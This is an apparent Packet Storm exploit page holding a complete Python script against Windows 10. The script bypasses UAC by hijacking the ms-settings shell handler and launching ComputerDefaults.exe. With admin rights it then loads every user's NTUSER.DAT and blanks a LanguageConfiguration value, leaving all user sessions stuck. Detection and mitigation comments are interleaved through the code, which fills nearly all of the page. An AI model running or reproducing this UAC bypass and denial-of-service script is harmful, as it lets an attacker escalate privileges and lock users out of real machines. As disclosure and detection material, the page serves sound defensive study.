Microsoft Windows 10 User Sessions Stuck

2018-10-30T00:00:00
ID PACKETSTORM:150120
Type packetstorm
Reporter Fabien Dromas
Modified 2018-10-30T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#  
# Exploit Title: Windows 10 All Users Session Stuck  
# Date: 2018-10-24  
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>  
# Twitter: st0rnpentest  
#   
# After Microsoft declined to treat the issue as a security problem, I am disclosing the script.  
# Vendor Homepage: www.microsoft.com  
# Version: Version 10.0.17134.345  
# Tested on: Windows 10 pro Version 10.0.17134.345  
#  
  
from os import listdir, system, path  
from ctypes import *  
import _winreg  
  
# Write one REG_SZ value under the current user's
# HKCU\Software\Classes\ms-settings\shell\open\command key, creating the key first.
#   key   -- value name to set (exec_bypass_uac passes None for the unnamed default value)
#   value -- string data stored under that name
# Defender note: this path is in the per-user hive and is written from the script's own
# process, so registry auditing on it is a natural detection point (for example Sysmon
# registry events 12/13 filtered on "ms-settings\shell\open\command").
# NOTE(review): the published page lost the file's indentation; lines are kept as published.
def create_reg_key(key, value):  
try:   
# CreateKey makes the key if it is absent; the handle it returns is discarded.
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')  
# Re-open the same key with write access only.
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)   
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)   
# The handle is closed on the success path only; a failing SetValueEx skips CloseKey.
_winreg.CloseKey(registry_key)  
# Catch-and-re-raise: WindowsError reaches the caller unchanged.
except WindowsError:   
raise  
  
# Register `cmd` as the per-user open command for the ms-settings class by writing two
# values through create_reg_key: an empty 'DelegateExecute' and the unnamed default value.
#   cmd -- command line stored as the default value of ...\shell\open\command
# Defender note: this is the widely documented ms-settings handler hijack, catalogued under
# MITRE ATT&CK T1548.002 (Bypass User Account Control). A 'DelegateExecute' value or a
# default command appearing under HKCU\Software\Classes\ms-settings is rarely legitimate and
# is worth alerting on. Setting UAC to "Always notify" and doing daily work from a
# standard (non-administrator) account are the usual mitigations for this class of bypass.
def exec_bypass_uac(cmd):  
try:  
create_reg_key('DelegateExecute', '')  
# None as the value name targets the key's default value.
create_reg_key(None, cmd)   
# Catch-and-re-raise: WindowsError reaches the caller unchanged.
except WindowsError:  
raise  
  
# Re-launch this script through the handler registered by exec_bypass_uac.
# Builds a cmd.exe command line that runs the script with c:\python27\python, stores it via
# exec_bypass_uac, then starts ComputerDefaults.exe. Returns 1 when no WindowsError occurs.
# Defender note: the observable side is process lineage. ComputerDefaults.exe followed by a
# cmd.exe or python child is anomalous, so process-creation logging with command lines
# (Security event 4688 or Sysmon event 1) will surface it.
# NOTE(review): the registry values written by exec_bypass_uac are not removed anywhere in
# the visible file, so they remain as a forensic artifact after the run.
def bypass_uac():   
try:   
# Script path = directory of the resolved file + '\' + __file__ as invoked.
current=path.dirname(path.realpath(__file__)) + '\\' + __file__  
cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current  
exec_bypass_uac(cmd)   
system(r'C:\windows\system32\ComputerDefaults.exe')   
return 1   
except WindowsError:  
# NOTE(review): `sys` is not imported in the visible import lines -- confirm.
sys.exit(1)   
  
# Set one REG_SZ value under the current user's
# HKCU\Control Panel\Desktop\LanguageConfiguration key (the key must already exist; it is
# opened, not created).
#   key   -- value name to set (the main block passes '')
#   value -- string data to store (the main block passes '')
# Defender note: per the page title, this write is what leaves the user session stuck, so
# the impact is availability of the profile rather than code execution. Auditing writes to
# this key and keeping a known-good copy of the profile hive help with detection and recovery.
# NOTE(review): the page does not describe how an affected profile is restored -- confirm
# the original value on a clean host of the same build before relying on a manual fix.
def modify_reg_key(key, value):  
try:   
registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)   
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)   
# The handle is closed on the success path only.
_winreg.CloseKey(registry_key)  
# Catch-and-re-raise: WindowsError reaches the caller unchanged.
except WindowsError:   
raise  
  
  
# Same write as modify_reg_key, but against HKEY_USERS\w00t\Control Panel\Desktop\
# LanguageConfiguration, i.e. a hive mounted under the fixed name "w00t".
#   key   -- value name to set (the main block passes '')
#   value -- string data to store (the main block passes '')
# The function relies on the caller having mounted a hive at HKU\w00t beforehand; the main
# block does that with reg.exe LOAD. It does no mounting or unmounting itself.
# Defender note: a transient HKU\w00t mount point and writes beneath it are specific to
# this script as published and make a simple hunting string.
def modify_reg_key_Others(key, value):  
try:   
registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)   
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)   
# The handle is closed on the success path only.
_winreg.CloseKey(registry_key)  
# Catch-and-re-raise: WindowsError reaches the caller unchanged.
except WindowsError:   
raise   
  
# Entry point. When the process is already an administrator it edits the
# LanguageConfiguration key for each profile directory under c:\users and for the current
# user; otherwise it calls bypass_uac(), which re-launches the script.
# Defender note: the cross-user effect depends on administrative rights (IsUserAnAdmin),
# so accounts that are not members of the local Administrators group limit the impact to
# their own profile. reg.exe LOAD/UNLOAD against other users' NTUSER.DAT files is visible in
# process-creation logs and is uncommon outside backup and migration tooling.
# NOTE(review): indentation was lost on the page, so whether "Modify current user" runs
# inside the per-profile loop or once after it cannot be determined from here.
if __name__ == '__main__':  
try:  
# sys32 is assigned but not used in the visible lines.
sys32="c:\\windows\\system32\\"  
users="c:\\users\\"  
# Entries under c:\users that are skipped.
exclude=["Public", "desktop.ini", "All Users"]  
  
# Modify all users  
if windll.Shell32.IsUserAnAdmin():  
for i in listdir(users):  
if i not in exclude:  
# Mount the profile's hive at HKU\w00t, write the value, then unmount it.
# The directory name is concatenated into a shell command line unquoted.
system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT")  
modify_reg_key_Others('', '')  
system("reg.exe UNLOAD HKU\w00t")  
  
# Modify current user   
modify_reg_key('', '')   
else:   
bypass_uac()  
# Catch-and-re-raise: WindowsError terminates the script with a traceback.
except WindowsError:  
raise   
`